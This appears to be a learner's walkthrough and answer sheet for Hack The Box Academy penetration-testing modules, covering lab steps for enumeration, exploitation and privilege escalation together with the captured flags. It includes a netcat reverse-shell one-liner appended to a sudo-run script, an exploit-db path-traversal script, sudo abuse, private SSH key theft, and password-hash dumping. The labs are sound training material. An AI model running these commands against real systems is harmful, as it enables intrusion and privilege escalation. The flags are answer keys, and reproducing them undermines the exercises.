Getting Started
Pentesting Basics
Service scanning
Perform an Nmap scan of the target. What does Nmap display as the version of the service running on port 8080?
Results: Apache Tomcat
Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on.
Results: 2323
List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.
smbclient /\/\10.129.125.178/\users -U bob
# password: Welcome1. Included in the path explanation
smb>dir
smb>cd flag
smb>get flag.txt
smb>quit
cat flag.txt
Results: dceece590f3284c3866305eb2473d099
Web Enumeration
Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag.
dirb http://94.237.55.246:55655/
# From enumeration you can get to dirb http://94.237.55.246:55655/robots.txt
Go to http://94.237.55.246:55655/robots.txt and you will notice http://94.237.55.246:55655/admin-login-page.php
Visit it and, hardcoded in the site you will see:
Login into the app.
Results: HTB{w3b_3num3r4710n_r3v34l5_53cr375}There are many retired boxes on the Hack The Box platform that are great for practicing Metasploit. Some of these include, but not limited to:
Public Exploits
Access to the web app at http://ip:36883
The title of the wordpress post is "Simple Backup Plugin 2.7.10", which is a well-known vulnerable plugin.
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
Simple Backup Plugin Python Exploit 2.7.10 - Path Traversa | php/webapps/51937.txt
----------------------------------------------------------- ---------------------------------
Shellcodes: No Results
sudo cp /usr/share/exploitdb/exploits/php/webapps/51937.txt .
mv 51937.txt 51937.py
chmod +x 51937.py
python ./51937.py http://83.136.255.162:36883/ "/flag.txt" 4
# target_url = sys.argv[1]
# file_name = sys.argv[2]
# depth = int(sys.argv[3])
Results: HTB{my_f1r57_h4ck}
Privilege Escalation
SSH to $ip with user "user1" and password "password1". SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.
ssh user1@$ip -p 31459
# password1
sudo -l
# User user1 may run the following commands on
# ng-644144-gettingstartedprivesc-udbk3-5969ffb656-cp248:
# (user2 : user2) NOPASSWD: /bin/bash
# One way:
echo #!/bin/bash > lala.sh
echo cat /home/user2/flag.txt >> lala.sh
chmod +x lala.sh
sudo -u user2 /bin/bash lala.sh
# Another
sudo -u user2 /bin/bash -i
Results: HTB{l473r4l_m0v3m3n7_70_4n07h3r_u53r}
Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.
Once you are user2, go to /root:
drwxr-x--- 1 root user2 4096 Feb 12 2021 .
drwxr-xr-x 1 root root 4096 Jun 3 19:21 ..
-rwxr-x--- 1 root user2 5 Aug 19 2020 .bash_history
-rwxr-x--- 1 root user2 3106 Dec 5 2019 .bashrc
-rwxr-x--- 1 root user2 161 Dec 5 2019 .profile
drwxr-x--- 1 root user2 4096 Feb 12 2021 .ssh
-rwxr-x--- 1 root user2 1309 Aug 19 2020 .viminfo
-rw------- 1 root root 33 Feb 12 2021 flag.txt
So we have read access in .ssh folder. We can access and copy the private key
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
....
QfPM8OxSjcVJCpAAAAEXJvb3RANzZkOTFmZTVjMjcwAQ==
-----END OPENSSH PRIVATE KEY-----
In our attacker machine we save that id_rsa key in our folder
And now we can login as root
And cat the flag:
Results: HTB{pr1v1l363_35c4l4710n_2_r007}
Attacking your first box
Nibbles - Enumeration
Run an nmap script scan on the target. What is the Apache version running on the server? (answer format: X.X.XX)
Results: 2.4.18
Nibbles - Initial Foothold
Gain a foothold on the target and submit the user.txt flag
Enumerate resources
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$ip/nibbleblog/FUZZ -H "HOST: $ip$"
dirb http://$ip/nibbleblog/
There are a lot of directory listing enabled. And eventually we can browser to: http://$ip/nibbleblog/content/private/users.xml
We can identify the user admin.
We could also enumerate http://$ip/nibbleblog/admin.php
Login access is admin:nibbles.
Go to Plugins tab and locate MyImage one: http://$ip/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image
Upload a PHP reverse shell, go to http://$IP/nibbleblog/content/private/plugins/my_image/
Set a netcat listener
Click on the reverse shell "image.php" and we will get a reverse shell.
Results: 79c03865431abf47b90ef24b9695e14879c03865431abf47b90ef24b9695e148
Nibbles - Privilege Escalation
Escalate privileges and submit the root.txt flag.
Results:
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
The nibbler
user can run the file /home/nibbler/personal/stuff/monitor.sh
with root privileges. Being that we have full control over that file, if we append a reverse shell one-liner to the end of it and execute with sudo
we should get a reverse shell back as the root user.
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IPattacker 8443 >/tmp/f' | tee -a monitor.sh
In the attacker machine, open a new netcat:
Run monitor.sh with sudo
In the new netcat connection you are root.
Results: de5e5d6619862a8aa5b9b212314e0cdd
Alternative way: Metasploit
Knowledge Check
Spawn the target, gain a foothold and submit the contents of the user.txt flag.
Go to http://$ip/robots.txt
Go to http://$ip/admin
Enter admin:admin
Go to Edit Theme: http://$ip/admin/theme-edit.php
Add a pentesmonkey shell and set a netcat listener on port 1234
Add gettingstarte.htb to your hosts file
Open the blog and you will get a reverse shell
Results: 7002d65b149b0a4d19132a66feed21d8
After obtaining a foothold on the target, escalate privileges to root and submit the contents of the root.txt flag.
Check out our permissions
Results:
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
Grab a simple php reverse shell such as:
Set up a netcat listener on port 4444:
Run as sudo:
You are root in the listener. Now
Results: f1fba6e9f71efb2630e6e34da6387842
Network Enumeration with Nmap
Host Enumeration
Host Discovery
Based on the last result, find out which operating system it belongs to. Submit the name of the operating system as result.
Result: Windows
Host and Port Scanning
Find all TCP ports on your target. Submit the total number of found TCP ports as the answer.
Results: 7
Enumerate the hostname of your target and submit it as the answer. (case-sensitive):
Results: nix-nmap-default
Saving the Results
Perform a full TCP port scan on your target and create an HTML report. Submit the number of the highest port as the answer.
Results: 31337
Service Enumeration
Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.
Results: HTB{pr0F7pDv3r510nb4nn3r}
Nmap Scripting Engine
Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer.
Result:
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.129.68.164
Host is up (0.047s latency).
PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_ /robots.txt: Robots file
Go to robots.txt and get the flag.
Results: HTB{873nniuc71bu6usbs1i96as6dsv26}
Bypass Security Measures
Firewall and IDS/IPS Evasion - Easy Lab
Our client wants to know if we can identify which operating system their provided machine is running on. Submit the OS name as the answer.
Results: Ubuntu
Firewall and IDS/IPS Evasion - Medium Lab
After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer.
Results: HTB{GoTtgUnyze9Psw4vGjcuMpHRp}
Firewall and IDS/IPS Evasion - Hard Lab
Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.
Results: HTB{kjnsdf2n982n1827eh76238s98di1w6}
Footprinting
Host Based Enumeration
FTP
Which version of the FTP server is running on the target system? Submit the entire banner as the answer.
Results: InFreight FTP v1.1
Enumerate the FTP server and find the flag.txt file. Submit the contents of it as the answer.
Enter user anonymous.
Enter password anonymous.
Results: HTB{b7skjr4c76zhsds7fzhd4k3ujg7nhdjre}
SMB
What version of the SMB server is running on the target system? Submit the entire banner as the answer.
Results: Samba smbd 4.6.2
What is the name of the accessible share on the target?
Results: sambashare
Connect to the discovered share and find the flag.txt file. Submit the contents as the answer.
Results: HTB{o873nz4xdo873n4zo873zn4fksuhldsf}
Find out which domain the server belongs to.
Results: DEVOPS
Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer.
Results: InFreight SMB v3.1
What is the full system path of that specific share? (format: "/directory/names")
Results: /home/sambauser
NFS
Enumerate the NFS service and submit the contents of the flag.txt in the "nfs" share as the answer.
sudo nmap $ip -p111,2049 -sV -sC
showmount -e $ip
mkdir target
sudo mount -t nfs $ip:/ ./target -o nolock
cd target
tree .
cat var/nfs/flag.txt
Results: HTB{hjglmvtkjhlkfuhgi734zthrie7rjmdze}
Enumerate the NFS service and submit the contents of the flag.txt in the "nfsshare" share as the answer.
Results: HTB{8o7435zhtuih7fztdrzuhdhkfjcn7ghi4357ndcthzuc7rtfghu34}
DNS
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.
Result: ns.inlanefreight.htb
Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...))
Results:
; <<>> DiG 9.19.21-1-Debian <<>> axfr inlanefreight.htb @10.129.218.112
;; global options: +cmd
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb. 604800 IN TXT "MS=ms97310371"
inlanefreight.htb. 604800 IN TXT "atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
inlanefreight.htb. 604800 IN TXT "v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_spf.atlassian.net ip4:10.129.124.8 ip4:10.129.127.2 ip4:10.129.42.106 ~all"
inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.
app.inlanefreight.htb. 604800 IN A 10.129.18.15
dev.inlanefreight.htb. 604800 IN A 10.12.0.1
internal.inlanefreight.htb. 604800 IN A 10.129.1.6
mail1.inlanefreight.htb. 604800 IN A 10.129.18.201
ns.inlanefreight.htb. 604800 IN A 127.0.0.1
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
;; Query time: 44 msec
;; SERVER: 10.129.218.112#53(10.129.218.112) (TCP)
;; WHEN: Wed Jul 31 13:57:45 EDT 2024
;; XFR size: 11 records (messages 1, bytes 560)
With the result, now we can do a second transfer zone
Results:
; <<>> DiG 9.19.21-1-Debian <<>> axfr internal.inlanefreight.htb @10.129.218.112
;; global options: +cmd
internal.inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
internal.inlanefreight.htb. 604800 IN TXT "MS=ms97310371"
internal.inlanefreight.htb. 604800 IN TXT "HTB{DN5_z0N3_7r4N5F3r_iskdufhcnlu34}"
internal.inlanefreight.htb. 604800 IN TXT "atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
internal.inlanefreight.htb. 604800 IN TXT "v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_spf.atlassian.net ip4:10.129.124.8 ip4:10.129.127.2 ip4:10.129.42.106 ~all"
internal.inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.
dc1.internal.inlanefreight.htb. 604800 IN A 10.129.34.16
dc2.internal.inlanefreight.htb. 604800 IN A 10.129.34.11
mail1.internal.inlanefreight.htb. 604800 IN A 10.129.18.200
ns.internal.inlanefreight.htb. 604800 IN A 127.0.0.1
vpn.internal.inlanefreight.htb. 604800 IN A 10.129.1.6
ws1.internal.inlanefreight.htb. 604800 IN A 10.129.1.34
ws2.internal.inlanefreight.htb. 604800 IN A 10.129.1.35
wsus.internal.inlanefreight.htb. 604800 IN A 10.129.18.2
internal.inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
;; Query time: 44 msec
;; SERVER: 10.129.218.112#53(10.129.218.112) (TCP)
;; WHEN: Wed Jul 31 13:58:29 EDT 2024
;; XFR size: 15 records (messages 1, bytes 677)
Then: HTB{DN5_z0N3_7r4N5F3r_iskdufhcnlu34}
What is the IPv4 address of the hostname DC1?
Get the answer from the response to the previous question. In this case: 10.129.34.16
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
dnsenum --dnsserver 10.129.218.112 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt dev.inlanefreight.htb
Results:
----- dev.inlanefreight.htb -----
Host's addresses:
__________________
Name Servers:
______________
ns.inlanefreight.htb. 604800 IN A 127.0.0.1
Mail (MX) Servers:
___________________
Trying Zone Transfers and getting Bind Versions:
_________________________________________________
unresolvable name: ns.inlanefreight.htb at /usr/bin/dnsenum line 892 thread 2.
Trying Zone Transfer for dev.inlanefreight.htb on ns.inlanefreight.htb ...
AXFR record query failed: no nameservers
Brute forcing with /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt:
__________________________________________________________________________
dev1.dev.inlanefreight.htb. 604800 IN A 10.12.3.6
ns.dev.inlanefreight.htb. 604800 IN A 127.0.0.1
win2k.dev.inlanefreight.htb. 604800 IN A 10.12.3.203
Therefore: win2k.dev.inlanefreight.htb
SMTP
Enumerate the SMTP service and submit the banner, including its version as the answer.
Results: InFreight ESMTP v2.11
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
for user in $(cat ~/Downloads/footprintingusers.txt); do echo VRFY $user | nc -nv -w 6 $ip 25 ; done
Results: robin
IMAP / POP3
Figure out the exact organization name from the IMAP/POP3 service and submit it as the answer.
Results: InlaneFreight Ltd
What is the FQDN that the IMAP and POP3 servers are assigned to?
Results: dev.inlanefreight.htb
Enumerate the IMAP service and submit the flag as the answer. (Format: HTB{...})
echo $ip inlanefreight.htb dev.inlanefreight.htb >> /etc/hosts
curl -k 'imaps://dev.inlanefreight.htb' --user robin:robin -v
* Host dev.inlanefreight.htb:993 was resolved.
* IPv6: (none)
* IPv4: 10.129.42.195
* Trying 10.129.42.195:993...
* Connected to dev.inlanefreight.htb (10.129.42.195) port 993
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / x25519 / RSASSA-PSS
* Server certificate:
* subject: C=UK; ST=London; L=London; O=InlaneFreight Ltd; OU=DevOps Dep�artment; CN=dev.inlanefreight.htb; emailAddress=cto.dev@dev.inlanefreight.htb
* start date: Nov 8 23:10:05 2021 GMT
* expire date: Aug 23 23:10:05 2295 GMT
* issuer: C=UK; ST=London; L=London; O=InlaneFreight Ltd; OU=DevOps Dep�artment; CN=dev.inlanefreight.htb; emailAddress=cto.dev@dev.inlanefreight.htb
* SSL certificate verify result: self-signed certificate (18), continuing anyway.
* Certificate level 0: Public key type RSA (2048/112 Bits/secBits), signed using sha256WithRSAEncryption
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* old SSL session ID is stale, removing
< * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] HTB{roncfbw7iszerd7shni7jr2343zhrj}
> A001 CAPABILITY
< * CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN
< A001 OK Pre-login capabilities listed, post-login capabilities have more.
> A002 AUTHENTICATE PLAIN AHJvYmluAHJvYmlu
< * CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SNIPPET=FUZZY PREVIEW=FUZZY LITERAL+ NOTIFY SPECIAL-USE
< A002 OK Logged in
> A003 LIST "" *
< * LIST (\Noselect \HasChildren) "." DEV
* LIST (\Noselect \HasChildren) "." DEV
< * LIST (\Noselect \HasChildren) "." DEV.DEPARTMENT
* LIST (\Noselect \HasChildren) "." DEV.DEPARTMENT
< * LIST (\HasNoChildren) "." DEV.DEPARTMENT.INT
* LIST (\HasNoChildren) "." DEV.DEPARTMENT.INT
< * LIST (\HasNoChildren) "." INBOX
* LIST (\HasNoChildren) "." INBOX
< A003 OK List completed (0.009 + 0.000 + 0.008 secs).
* Connection #0 to host dev.inlanefreight.htb left intact
Results: HTB{roncfbw7iszerd7shni7jr2343zhrj}
What is the customized version of the POP3 server?
Results: InFreight POP3 v9.188
What is the admin email address?
# Establish a imap connection
openssl s_client -connect $ip:imaps
# Login as user robin with password robin
a LOGIN robin robin
# List inboxes
a LIST "" *
# Select one of them
a SELECT DEV.DEPARTMENT.INT
# Retrieves the messages by ID
a FETCH 1 all
Results: devadmin@inlanefreight.htb
Try to access the emails on the IMAP server and submit the flag as the answer. (Format: HTB{...})
# Establish a imap connection
openssl s_client -connect $ip:imaps
# Login as user robin with password robin
a LOGIN robin robin
# List inboxes
a LIST "" *
# Select one of them
a SELECT DEV.DEPARTMENT.INT
# Retrieve the messages by ID
a FETCH 1 all
# Retrieve the content of the message with id 1
a FETCH 1 BODY.PEEK[TEXT]
Results: HTB{983uzn8jmfgpd8jmof8c34n7zio}
SNMP
Enumerate the SNMP service and obtain the email address of the admin. Submit it as the answer.
Results: devadmin@inlanefreight.htb
What is the customized version of the SNMP server?
Results: InFreight SNMP v0.91
Enumerate the custom script that is running on the system and submit its output as the answer.
Results: HTB{5nMp_fl4g_uidhfljnsldiuhbfsdij44738b2u763g}
MySQL
Enumerate the MySQL server and determine the version in use. (Format: MySQL X.X.XX)
Results: MySQL 8.0.27
During our penetration test, we found weak credentials "robin:robin". We should try these against the MySQL server. What is the email address of the customer "Otto Lang"?
Results: ultrices@google.htb
MSSQL
Enumerate the target using the concepts taught in this section. List the hostname of MSSQL server.
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $ip
Results: ILF-SQL-01
Connect to the MSSQL instance running on the target using the account (backdoor:Password1), then list the non-default database present on the server.
Results: Employees
Oracle TNS
Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer.
python3 ./odat.py all -s $ip
# With this we obtain the creds scott/tiger
# Now we connect to the database
sqlplus scott/tiger@$ip/XE as sysdba
# Extract Password Hashes
select name, password from sys.user$;
Results: E066D214D5421CCC
IPMI
What username is configured for accessing the host via IPMI?
Results: admin
What is the account's cleartext password?
sudo msfdb init
msfconsole -q
use auxiliary/scanner/ipmi/ipmi_dumphashes
set PASS_FILE /usr/share/wordlists/rockyou.txt
run
Results: trinity
Skills assessment
Footprinting Lab - Easy
We were commissioned by the company Inlanefreight Ltd
to test three different servers in their internal network. The company uses many different services, and the IT security department felt that a penetration test was necessary to gain insight into their overall security posture. The first server is an internal DNS server that needs to be investigated. In particular, our client wants to know what information we can get out of these services and how this information could be used against its infrastructure. Our goal is to gather as much information as possible about the server and find ways to use that information against the company. However, our client has made it clear that it is forbidden to attack the services aggressively using exploits, as these services are in production. Additionally, our teammates have found the following credentials "ceil:qwer1234", and they pointed out that some of the company's employees were talking about SSH keys on a forum. The administrators have stored a flag.txt
file on this server to track our progress and measure success. Fully enumerate the target and submit the contents of this file as proof.
Enumerate the server carefully and find the flag.txt file. Submit the contents of this file as the answer.
ftp $ip -p 2121
# enter user `ceil` and password `qwer1234`
ls -la
cd .ssh
get id_rsa ~/.ssh/
quit
chmod 600 ~/.ssh/id_rsa
ssh -i ~/.ssh/id_rsa ceil@$ip
find / -name flag.txt 2>/dev/null
cat /home/flag/flag.txt
Results: HTB{7nrzise7hednrxihskjed7nzrgkweunj47zngrhdbkjhgdfbjkc7hgj}
Footprinting Lab - Medium
This second server is a server that everyone on the internal network has access to. In our discussion with our client, we pointed out that these servers are often one of the main targets for attackers and that this server should be added to the scope. Our customer agreed to this and added this server to our scope. Here, too, the goal remains the same. We need to find out as much information as possible about this server and find ways to use it against the server itself. For the proof and protection of customer data, a user named HTB
has been created. Accordingly, we need to obtain the credentials of this user as proof.
Enumerate the server carefully and find the username "HTB" and its password. Then, submit this user's password as the answer.
sudo nmap -sS -sV -top-ports 4000 $ip
# We will attack firts service 2049
showmount -e $ip
mkdir target-NFS
sudo mount -t nfs $ip:/ ./target-NFS/ -o nolock
cd target-NFS
sudo ls -la
sudo ls -la TechSupport
sudo cat TechSupport/ticket4238791283782.txt
Credentials are obtained for accessing a different service:
A Windows connection opens up.
We browse the machine and find C:\Users\alex\devshare\important
file, that contains the following creds:
Right click on Microsoft SQL Server Management Studio and select "Execute as Administrator". Enter the creds 87N1ns@slls83
. Now we connect to the server:
Browse around, but the final SQL query would be
Results: lnch7ehrdn43i7AoqVPK4zWR
Footprinting Lab - Hard
The third server is an MX and management server for the internal network. Subsequently, this server has the function of a backup server for the internal accounts in the domain. Accordingly, a user named HTB
was also created here, whose credentials we need to access.
Enumerate the server carefully and find the username "HTB" and its password. Then, submit HTB's password as the answer.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
110/tcp open pop3 Dovecot pop3d
143/tcp open imap Dovecot imapd (Ubuntu)
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
995/tcp open ssl/pop3 Dovecot pop3d
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We start with SNMP vulnerabilities:
In the result, you can spot the community string
backup
. Now, we can use braa:
In the results a credential is showed:
We use that credential to login into the IMAP server:
openssl s_client -connect $ip:imaps
a LOGIN tom NMds732Js2761
a SELECT INBOX
a FETCH 1 all
a FETCH 1 BODY.PEEK[TEXT]
And we obtain a OPENSSH PRIVATE KEY that we save into our ~/.ssh folder. We give 600 permission to the file id_rsa.
Now, we are in. I had a look at the history file and saw a MySQL connection:
I decided to have a look at it:
Results: cr3n4o7rzse7rzhnckhssncif7ds
Information Gathering - Web Edition
WHOIS
Utilizing WHOIS
Perform a WHOIS lookup against the paypal.com domain. What is the registrar Internet Assigned Numbers Authority (IANA) ID number?
Results: 292
What is the admin email contact for the tesla.com domain (also in-scope for the Tesla bug bounty program)?
Results: admin@dnstinations.com
DNS & Subdomains
Digging DNS
Which IP address maps to inlanefreight.com?
Results: 134.209.24.248
Which domain is returned when querying the PTR record for 134.209.24.248?
Results: inlanefreight.com
What is the full domain returned when you query the mail records for facebook.com?
Results: smtpin.vvv.facebook.com
Subdomain BruteForcing
Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com.
dnsenum --enum inlanefreight.com -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -r
Results: my.inlanefreight.com
DNS Zone Transfers
After performing a zone transfer for the domain inlanefreight.htb on the target system, how many DNS records are retrieved from the target system's name server? Provide your answer as an integer, e.g, 123.
# Response
; <<>> DiG 9.19.21-1-Debian <<>> axfr inlanefreight.htb @10.129.72.193
;; global options: +cmd
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.
admin.inlanefreight.htb. 604800 IN A 10.10.34.2
ftp.admin.inlanefreight.htb. 604800 IN A 10.10.34.2
careers.inlanefreight.htb. 604800 IN A 10.10.34.50
dc1.inlanefreight.htb. 604800 IN A 10.10.34.16
dc2.inlanefreight.htb. 604800 IN A 10.10.34.11
internal.inlanefreight.htb. 604800 IN A 127.0.0.1
admin.internal.inlanefreight.htb. 604800 IN A 10.10.1.11
wsus.internal.inlanefreight.htb. 604800 IN A 10.10.1.240
ir.inlanefreight.htb. 604800 IN A 10.10.45.5
dev.ir.inlanefreight.htb. 604800 IN A 10.10.45.6
ns.inlanefreight.htb. 604800 IN A 127.0.0.1
resources.inlanefreight.htb. 604800 IN A 10.10.34.100
securemessaging.inlanefreight.htb. 604800 IN A 10.10.34.52
test1.inlanefreight.htb. 604800 IN A 10.10.34.101
us.inlanefreight.htb. 604800 IN A 10.10.200.5
cluster14.us.inlanefreight.htb. 604800 IN A 10.10.200.14
messagecenter.us.inlanefreight.htb. 604800 IN A 10.10.200.10
ww02.inlanefreight.htb. 604800 IN A 10.10.34.112
www1.inlanefreight.htb. 604800 IN A 10.10.34.111
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
;; Query time: 540 msec
;; SERVER: 10.129.72.193#53(10.129.72.193) (TCP)
;; WHEN: Tue Sep 10 15:25:16 EDT 2024
;; XFR size: 22 records (messages 1, bytes 594)
Results: 22
Within the zone record transferred above, find the ip address for ftp.admin.inlanefreight.htb. Respond only with the IP address, eg 127.0.0.1
Results: 10.10.34.2
Within the same zone record, identify the largest IP address allocated within the 10.10.200 IP range. Respond with the full IP address, eg 10.10.200.1
Results: 10.10.200.14
Virtual Hosts
Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "web"? Answer using the full domain, e.g. "x.inlanefreight.htb"
Important, the --append-domain part
gobuster vhost -u http://$domain:$port/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
Results: web17611.inlanefreight.htb
Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "vm"? Answer using the full domain, e.g. "x.inlanefreight.htb"
Results: vm5.inlanefreight.htb
Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "br"? Answer using the full domain, e.g. "x.inlanefreight.htb"
Results: browser.inlanefreight.htb
Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "a"? Answer using the full domain, e.g. "x.inlanefreight.htb"
Results: admin.inlanefreight.htb
Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "su"? Answer using the full domain, e.g. "x.inlanefreight.htb"
Results: support.inlanefreight.htb
Fingerprinting
Fingerprinting
Determine the Apache version running on app.inlanefreight.local on the target system. (Format: 0.0.0)
Results: 2.4.41B
Which CMS is used on app.inlanefreight.local on the target system? Respond with the name only, e.g., WordPress.
Results: Joomla
On which operating system is the dev.inlanefreight.local webserver running in the target system? Respond with the name only, e.g., Debian.
Results: Ubuntu
Crawling
Creepy crawlies
After spidering inlanefreight.com, identify the location where future reports will be stored. Respond with the full domain, e.g., files.inlanefreight.com.
Results: inlanefreight-comp133.s3.amazonaws.htb
Web Archives
How many Pen Testing Labs did HackTheBox have on the 8th August 2018? Answer with an integer, eg 1234.
Go to https://web.archive.org/web/20180808080705/https://www.hackthebox.eu/
Results: 74
How many members did HackTheBox have on the 10th June 2017? Answer with an integer, eg 1234.
Go to https://web.archive.org/web/20180808080705/https://www.hackthebox.eu/
Results: 3054
Going back to March 2002, what website did the facebook.com domain redirect too? Answer with the full domain, eg http://www.facebook.com/
Go to https://web.archive.org/web/20020601000000*/www.facebook.com
Results: http://site.aboutface.com/
According to the paypal.com website in October 1999, what could you use to "beam money to anyone"? Answer with the product name, eg My Device, remove the ™ from your answer.
Go to https://web.archive.org/web/19991013140707/http://paypal.com/
Results: Palm 0rganizer
Going back to November 1998 on google.com, what address hosted the non-alpha "Google Search Engine Prototype" of Google? Answer with the full address, eg http://google.com
Go to https://web.archive.org/web/19981111184551/http://google.com/
Results: http://google.stanford.edu/
Going back to March 2000 on www.iana.org, when exacty was the site last updated? Answer with the date in the footer, eg 11-March-99
Go to https://web.archive.org/web/20000303211237/http://www.iana.org/
Results: 17-December-99
According to the wikipedia.com snapshot taken in March 2001, how many pages did they have over? Answer with the number they state without any commas, eg 2000 not 2,000
Go to https://web.archive.org/web/20010331173908/http://www.wikipedia.com/
Results: 3000
Skills Assessment
What is the IANA ID of the registrar of the inlanefreight.com domain?
Results: 468
What http server software is powering the inlanefreight.htb site on the target system? Respond with the name of the software, not the version, e.g., Apache.
Results: nginx
What is the API key in the hidden admin directory that you have discovered on the target system?
# 1. Add $ip inlanefreight.htb to /etc/hosts
# 2. Create variable $port
# 3. Do a vhost scan. For instance
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://inlanefreight.htb:$port -H "HOST:FUZZ.inlanefreight.htb" -fs 120
# 4. Add the discovered VHOST to /etc/hosts
# 5. Enumerate the site
dirb http://web1337.inlanefreight.htb:$port
# 6. There is a robots.txt file in the results, with a hiden admin panel. Trying to access directly the panel returns a 404. However we could try to fuzz it deeper:
